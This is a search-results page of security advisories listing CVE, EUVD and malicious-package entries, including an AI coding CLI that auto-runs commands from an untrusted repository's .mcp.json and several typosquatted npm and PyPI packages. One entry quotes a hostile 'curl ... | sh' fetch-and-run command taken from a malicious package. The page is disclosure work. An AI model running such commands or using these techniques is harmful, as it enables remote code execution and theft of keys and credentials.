6401 matches found
CVE-2026-57860 ForgeCode Arbitrary Code Execution via Unvetted .mcp.json in Untrusted Repository
ForgeCode tailcallhq/forgecode, an AI pair-programming CLI, automatically loads and executes the MCP servers defined in a repository's .mcp.json file on startup without user confirmation. A malicious repository can supply a crafted .mcp.json whose mcpServers entries specify arbitrary command and...
EUVD-2026-45217
ForgeCode tailcallhq/forgecode, an AI pair-programming CLI, automatically loads and executes the MCP servers defined in a repository's .mcp.json file on startup without user confirmation. A malicious repository can supply a crafted .mcp.json whose mcpServers entries specify arbitrary command and...
CVE-2026-62222
OpenClaw before 2026.5.22 contain a vulnerability in setup-mode discovery that allows loading of untrusted workspace plugins. Attackers with lower-trust caller access or control over configured input paths can execute or persist actions beyond their intended authorization level...
EUVD-2026-45110
OpenClaw before 2026.5.22 contain a vulnerability in setup-mode discovery that allows loading of untrusted workspace plugins. Attackers with lower-trust caller access or control over configured input paths can execute or persist actions beyond their intended authorization level...
EUVD-2026-44950
Axelor Open Platform versions 8.x prior to 8.2.2 contains an authorization bypass vulnerability that allows authenticated non-admin users to escalate privileges by exploiting unenforced field restrictions on nested relational save operations. Attackers can modify sensitive User record fields such...
CVE-2026-63085
Axelor Open Platform 8.x prior to 8.2.2 contains an authorization bypass vulnerability. Authenticated non-admins can escalate privileges by exploiting unenforced field restrictions on nested relational save operations, enabling modification of sensitive User fields (roles, groups) through a relat...
HelloNet campaign — new malicious modules launched through the ViPNet update system
UPD 16.07.2026: Added rules to protect companies using our SIEM system Kaspersky SIEM, and listed events for developing custom detection rules or conducting Threat hunting. UPD 16.07.2026: Added detection of the malicious activity using Kaspersky Managed Detection and Response. UPD 16.07.2026:...
Malicious code in vor8zakon (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 99924288481504c324c3f573ba7ba99ac4e1c7a7f22a940c94d81059b868fdfd Package advertises itself as 'A simple cryptographic library for JavaScript applications' but ships no crypto code and exports nothing. package.json...
MAL-2026-10691 Malicious code in internallib_v907 (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 40689180cd10e4352f018c9ffc96ddd110f12299bd83f195fe9879e28d1de59e index.js line 5 invokes exec'/bin/bash -c "curl https://reverse-shell.sh/... | sh"', piping a remote script directly into a shell. The fetched payloa...
MAL-2026-10689 Malicious code in pylogora (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector dfecc686b83d148b0b68acd99fe38f484c035c5b9c59fb7623378866e8e307cc pylogora/init.py invokes a at module top level, so any import pylogora triggers the payload. a base64-decodes hidden URLs and filesystem paths,...
Malicious code in pylogora (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector dfecc686b83d148b0b68acd99fe38f484c035c5b9c59fb7623378866e8e307cc pylogora/init.py invokes a at module top level, so any import pylogora triggers the payload. a base64-decodes hidden URLs and filesystem paths,...
CVE-2026-14960 CVE-2026-14960
Pegatron Tdelo64.sys improperly exposes privileged hardware access functionality through the \.\TdeIo device interface. IOCTL handlers including TDEIOCTLINDEXIOREAD and TDEIOCTLINDEXIOWRITE permit unprivileged user-mode callers to perform arbitrary hardware I/O port reads and writes without...
Malicious code in ethereum-input-decorder (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 94137fcf0aee7d8edb4e15a8bc9be4455fbdf79cb5bf99987b79f0393fdff62c The package name typosquats the legitimate 'ethereum-input-decoder'. Its top-level init.py unconditionally invokes a payload routine on import: it...
MAL-2026-10643 Malicious code in ethereum-input-decorder (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 94137fcf0aee7d8edb4e15a8bc9be4455fbdf79cb5bf99987b79f0393fdff62c The package name typosquats the legitimate 'ethereum-input-decoder'. Its top-level init.py unconditionally invokes a payload routine on import: it...
MAL-2026-10591 Malicious code in solana-key-utils (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 68b4680547530fce361014fe8c228734a8ec33bc8c834f46285e371e8f6b9f92 On require, index.js waits 37 seconds, reads test/fixtures/keypairs.dat a 53KB base64 blob disguised as a test fixture, no test harness references it...
Malicious code in ethers-core (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 3959190c7c321e0d6f512b89b3c54a6399f3e6f7daecd0563ff753a6a6fed2f5 Package name typosquats the popular 'ethers' library. package.json declares a postinstall pointing at dist/index.min.js, whose sole top-level stateme...
MAL-2026-10580 Malicious code in ethers-core (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 3959190c7c321e0d6f512b89b3c54a6399f3e6f7daecd0563ff753a6a6fed2f5 Package name typosquats the popular 'ethers' library. package.json declares a postinstall pointing at dist/index.min.js, whose sole top-level stateme...
Malicious code in tennacity (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector c7933cd1ec11531feba788870555eeac615535d8e230b4d252880def9c68ff5e tennacity is a one-character typosquat of the popular 'tenacity' library; its README/PKG-INFO are copied verbatim from real tenacity while setup.py...
MAL-2026-10576 Malicious code in tennacity (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector c7933cd1ec11531feba788870555eeac615535d8e230b4d252880def9c68ff5e tennacity is a one-character typosquat of the popular 'tenacity' library; its README/PKG-INFO are copied verbatim from real tenacity while setup.py...
EUVD-2026-43645
In Eclipse Jetty, a first HTTP/1.1 request with trailers causes the server to retain the trailers in subsequent requests performed over the same connection. Subsequent request that do not have trailers report the trailers of the first request. Subsequent request that do have trailers report the...